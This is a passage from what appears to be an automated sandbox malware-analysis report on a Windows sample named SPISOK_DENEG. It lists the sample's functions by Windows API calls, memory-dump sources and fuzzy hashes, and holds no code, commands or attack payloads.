                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: c00582e57ea36549f75520af2e4184d3da910e1427aabf3f8b663ccc8e5954a6
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 0001D67220030D6BE331CF65D886DBAFBE9FB85370F25052DE69483682EA30A905C764
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000FB177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 08baac2ea3bb6a4633b49794bba1c59cc4de785936d3cc380302b12c4834bd24
                                                            • Instruction ID: a98d5a63cf6542020bd1a1c9d0dd52fb60e12ba1e624efff8f70ed3ac79127ee
                                                            • Opcode Fuzzy Hash: 08baac2ea3bb6a4633b49794bba1c59cc4de785936d3cc380302b12c4834bd24
                                                            • Instruction Fuzzy Hash: 56F0B43250512CB7DB715A21EC2ABBF3788BF81760B5C8221FE0896991CB30D901AAE0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 000F3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a54ddbb5b33aaccb8bcbd683cf960b6e1caded1f08ad1dc863e4f2003c756cbd
                                                            • Instruction ID: c76fa37ccd289ac8c841ce49a2a60f9e72fb5f758128f9294d56cd21965f9346
                                                            • Opcode Fuzzy Hash: a54ddbb5b33aaccb8bcbd683cf960b6e1caded1f08ad1dc863e4f2003c756cbd
                                                            • Instruction Fuzzy Hash: 13F0E53220021E9FCF559EA8EC109AA77E9EF41B307144125FB15E7990DB31EA20E7D0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 65db2d2613c9afe2b894a585d861071fb2c3171f8cc488f9d5a2b3c43301bfae
                                                            • Instruction ID: 06244df4ed4b00d9b879f03f2658c7e08e10a63ea4376f9226a8783307352cff
                                                            • Opcode Fuzzy Hash: 65db2d2613c9afe2b894a585d861071fb2c3171f8cc488f9d5a2b3c43301bfae
                                                            • Instruction Fuzzy Hash: 43E06D3560622D67EAB166659D09BFF768C9F817A4F158121AE5896C92CF60CC00B3E1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D5AC2
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 235270631d169710dd4ed23df9d26f98f5103d3b543b45f5b4f85b9751e61e3d
                                                            • Instruction ID: 061bf618ac0b80c3479641e96ec77d567e95fc1e220fd3e640c81cc3fde47f52
                                                            • Opcode Fuzzy Hash: 235270631d169710dd4ed23df9d26f98f5103d3b543b45f5b4f85b9751e61e3d
                                                            • Instruction Fuzzy Hash: 1F018C308107D4DED725E7B8C0457DDFBA49FA4304F50848EA45663283CBF81B08D7A2
                                                            APIs
                                                              • Part of subcall function 000DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6C4
                                                              • Part of subcall function 000DA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6F2
                                                              • Part of subcall function 000DA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000DA592,000000FF,?,?), ref: 000DA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: b3930abbcdf214be1efdcd81868758880eb94b3d195e78463d6f3d60c3696928
                                                            • Instruction ID: 1bc34807cb667f9a380fd7607475121f2207987722f1840e3a63477143182eba
                                                            • Opcode Fuzzy Hash: b3930abbcdf214be1efdcd81868758880eb94b3d195e78463d6f3d60c3696928
                                                            • Instruction Fuzzy Hash: A9F05E32009790AACA6257B89904BDB7B906F1B331F048A4AF1F95229AC27550949B33
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 000E0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 2a2387529ddc47929038f6482d0bdd843c76528535354a7affe12bd90636bc1c
                                                            • Instruction ID: 5073ff685f1823c418efea79c4cc5fb36d0529ffae42758f7a83dccab3ff2c85
                                                            • Opcode Fuzzy Hash: 2a2387529ddc47929038f6482d0bdd843c76528535354a7affe12bd90636bc1c
                                                            • Instruction Fuzzy Hash: DAD0C221A111D46EDA15332A29157FE254B8FCB310F0D0036B14977783CBA908C2A271
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 000EA62C
                                                              • Part of subcall function 000EA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000EA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: 2303e7daec2e2031c5cd3b912d0df85955b97fd97259e67066866096cdabf6fe
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: DFD0C77131024DBEDF516B73CC129AF7595FB0A340F048125B851E5152EAB1ED109562
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000E1B3E), ref: 000EDD92
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: eacbc8663a4c7c6bf5c0548c714424de14c58c3b5f824502a7ed3dc627696e69
                                                            • Instruction ID: 29c50d6ee49c12f347b6f7eb55ef15a7adb684cba568c2edc1ccb80a84036676
                                                            • Opcode Fuzzy Hash: eacbc8663a4c7c6bf5c0548c714424de14c58c3b5f824502a7ed3dc627696e69
                                                            • Instruction Fuzzy Hash: 41D09E32144340BED6022B52DE06F4B7AE2AB88B05F404554B384744B2CAB29D61EB15
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 000EE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 76546145c8c809ed584df79f6a788235751b73d1f597445ecacb76ab1885d24d
                                                            • Instruction ID: 60c7ad8c916d19d7c032b53d241f3fdcdda431c719496fa33eefb13fd4245315
                                                            • Opcode Fuzzy Hash: 76546145c8c809ed584df79f6a788235751b73d1f597445ecacb76ab1885d24d
                                                            • Instruction Fuzzy Hash: 91D012B01C06D8AFD755EBAAD94A7593395B324B46F901101F18DF18A2DBA445C0CA25
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,000D97BE), ref: 000D98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 30ddede7bdb1a01e2a3ef2509cb1a33bbf3c06c91e1cc32a8c482915a7d44e80
                                                            • Instruction ID: 9de893725cd3a5055dc7cbccf2302a83c457ca7824b9a0c427666a8ad0293c7d
                                                            • Opcode Fuzzy Hash: 30ddede7bdb1a01e2a3ef2509cb1a33bbf3c06c91e1cc32a8c482915a7d44e80
                                                            • Instruction Fuzzy Hash: 07C0123440030585CE60462498440957351AB537657B88695D068851E1C722CC87FB30
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8b86d6b4a11227ff7e2524f6164e6cf27ba4d32105fa2d1cdf0ec7fb7cb4021d
                                                            • Instruction ID: 13403987b89ed659161b1c3a5ed5a3699c5c81f4c4ba2679f6cdb2cb4678042c
                                                            • Opcode Fuzzy Hash: 8b86d6b4a11227ff7e2524f6164e6cf27ba4d32105fa2d1cdf0ec7fb7cb4021d
                                                            • Instruction Fuzzy Hash: E6B092A92581C4ACA10812469E12C3B010CC281B21320852ABC15E0481AA80AC441871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d5fc38e2326ba0ccc9fb355b66dbeb0efff40402dbc4e4cf676eab45b6e086ce
                                                            • Instruction ID: ae80443911c9e0f97c5919dfc83231ddef08b30d59205393c8b37d3278656cc7
                                                            • Opcode Fuzzy Hash: d5fc38e2326ba0ccc9fb355b66dbeb0efff40402dbc4e4cf676eab45b6e086ce
                                                            • Instruction Fuzzy Hash: 13B012F935C1C8ACF108524B9E02C3B010CC2C0B21330813EFC19E00C1EF806C441D71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 822250cddeddb5d494830e91f521f4c8c852d140b4bc14429a283e69c02af6a2
                                                            • Instruction ID: ae205f91ba3f11fcf73a96aeb683e5ea4a854f3c5dd316592ee43a2d18a7591d
                                                            • Opcode Fuzzy Hash: 822250cddeddb5d494830e91f521f4c8c852d140b4bc14429a283e69c02af6a2
                                                            • Instruction Fuzzy Hash: A5B092A52580C4ACB10852069E02C3A010CC281B11320C12AB819E01C1AA80A8480871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a5e8a9eaf1fc864c763bfcce6ca42e1f76f320b1eb5ce50b164ef370f7bc16d3
                                                            • Instruction ID: 32f8c21b46cca4cdb512be91a2c98de592ac452287ca7e8ca85a2e5c250a7a42
                                                            • Opcode Fuzzy Hash: a5e8a9eaf1fc864c763bfcce6ca42e1f76f320b1eb5ce50b164ef370f7bc16d3
                                                            • Instruction Fuzzy Hash: 08B092A52580C4ACB10852079E02C3A010CC280B11320812AB819E01C1AE9069891871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 34d1efb58842acbe114a2710717418b0ba19411e7ddbb1685e99bf8c6064028e
                                                            • Instruction ID: f24e0ef7a6912034bae8b31a2295f70542a51dd80dc08494f1b1f8d23e961473
                                                            • Opcode Fuzzy Hash: 34d1efb58842acbe114a2710717418b0ba19411e7ddbb1685e99bf8c6064028e
                                                            • Instruction Fuzzy Hash: 21B092A53581C8ACB14852069E02C3A010CC280B12320822AB819E01C1AA8068880871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3fe05fbdf08f11c86f1af960dcfe5a947414312fdf81886d8a448b9f5ccaf8b6
                                                            • Instruction ID: b194f7fdd89c056287445fb00588cdc33eec95e05d29127cf51340156f25eead
                                                            • Opcode Fuzzy Hash: 3fe05fbdf08f11c86f1af960dcfe5a947414312fdf81886d8a448b9f5ccaf8b6
                                                            • Instruction Fuzzy Hash: 50B092B52580C4ACA10852069E02C3A011CC281B11320812AB819E0081AA80A9440871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
